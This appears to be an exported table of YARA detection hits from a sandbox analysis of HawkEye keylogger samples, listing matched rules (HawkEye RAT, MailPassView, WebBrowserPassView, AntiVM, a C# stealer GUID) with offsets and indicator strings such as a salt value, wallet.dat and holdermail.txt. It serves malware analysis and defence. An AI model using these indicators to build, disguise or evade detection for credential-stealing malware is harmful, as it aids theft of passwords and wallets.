00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000007.00000000.315200782.0000000007EE0000.00000004.00020000.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000012.00000000.408464737.0000000008660000.00000004.00020000.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000007.00000000.313223758.0000000002D6A000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000007.00000000.313404967.0000000002DFA000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
0000000B.00000000.319742971.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000000.318371710.0000000003AA1000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000000.318371710.0000000003AA1000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000007.00000000.313199266.0000000002D5E000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000007.00000000.313199266.0000000002D5E000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x25f8:$hawkstr1: HawkEye Keylogger 0x2088:$hawkstr2: Dear HawkEye Customers! 0x21b6:$hawkstr3: HawkEye Logger Details:
00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000016.00000000.399210452.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000A.00000000.316648058.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000000.00000002.296608068.0000000003321000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000B.00000000.320558066.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
0000000B.00000000.320160730.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000017.00000000.402469174.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000012.00000000.391692528.000000000359A000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000012.00000000.391692528.000000000359A000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7230:$hawkstr1: HawkEye Keylogger 0xc090:$hawkstr1: HawkEye Keylogger 0xc0f0:$hawkstr2: Dear HawkEye Customers! 0x126:$hawkstr3: HawkEye Logger Details:
0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000017.00000002.404452957.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000002.362315745.0000000002ADF000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000007.00000002.362315745.0000000002ADF000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x9ff4:$hawkstr1: HawkEye Keylogger 0xd3c8:$hawkstr1: HawkEye Keylogger 0xd7a4:$hawkstr1: HawkEye Keylogger 0xe728:$hawkstr1: HawkEye Keylogger 0x9a84:$hawkstr2: Dear HawkEye Customers! 0xc80c:$hawkstr2: Dear HawkEye Customers! 0xd428:$hawkstr2: Dear HawkEye Customers! 0xd804:$hawkstr2: Dear HawkEye Customers! 0x9bb2:$hawkstr3: HawkEye Logger Details: 0xc936:$hawkstr3: HawkEye Logger Details:
00000012.00000000.392382903.00000000042D1000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000012.00000000.392382903.00000000042D1000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000012.00000000.400644306.00000000035EA000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000017.00000000.402038118.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000017.00000000.401599576.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x4a2429:$key: HawkEyeKeylogger 0x524449:$key: HawkEyeKeylogger 0x4a46a7:$salt: 099u787978786 0x5266c7:$salt: 099u787978786 0x4a2a86:$string1: HawkEye_Keylogger 0x4a38d9:$string1: HawkEye_Keylogger 0x4a4607:$string1: HawkEye_Keylogger 0x524aa6:$string1: HawkEye_Keylogger 0x5258f9:$string1: HawkEye_Keylogger 0x526627:$string1: HawkEye_Keylogger 0x4a2e6f:$string2: holdermail.txt 0x4a2e8f:$string2: holdermail.txt 0x524e8f:$string2: holdermail.txt 0x524eaf:$string2: holdermail.txt 0x4a2db1:$string3: wallet.dat 0x4a2dc9:$string3: wallet.dat 0x4a2ddf:$string3: wallet.dat 0x524dd1:$string3: wallet.dat 0x524de9:$string3: wallet.dat 0x524dff:$string3: wallet.dat 0x4a41cb:$string4: Keylog Records
00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x4a2ade:$hawkstr1: HawkEye Keylogger 0x4a391f:$hawkstr1: HawkEye Keylogger 0x4a3c4e:$hawkstr1: HawkEye Keylogger 0x4a3da9:$hawkstr1: HawkEye Keylogger 0x4a3f0c:$hawkstr1: HawkEye Keylogger 0x4a41a3:$hawkstr1: HawkEye Keylogger 0x524afe:$hawkstr1: HawkEye Keylogger 0x52593f:$hawkstr1: HawkEye Keylogger 0x525c6e:$hawkstr1: HawkEye Keylogger 0x525dc9:$hawkstr1: HawkEye Keylogger 0x525f2c:$hawkstr1: HawkEye Keylogger 0x5261c3:$hawkstr1: HawkEye Keylogger 0x4a2650:$hawkstr2: Dear HawkEye Customers! 0x4a3ca1:$hawkstr2: Dear HawkEye Customers! 0x4a3df8:$hawkstr2: Dear HawkEye Customers! 0x4a3f5f:$hawkstr2: Dear HawkEye Customers! 0x524670:$hawkstr2: Dear HawkEye Customers! 0x525cc1:$hawkstr2: Dear HawkEye Customers! 0x525e18:$hawkstr2: Dear HawkEye Customers! 0x525f7f:$hawkstr2: Dear HawkEye Customers! 0x4a2771:$hawkstr3: HawkEye Logger Details:
00000012.00000002.439615340.0000000008660000.00000004.00020000.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000007.00000002.367050092.0000000007EE0000.00000004.00020000.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000007.00000002.364013571.0000000003AA1000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000002.364013571.0000000003AA1000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000007.00000000.320411963.0000000007C60000.00000004.00020000.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
0000000F.00000002.356792870.0000000002C01000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
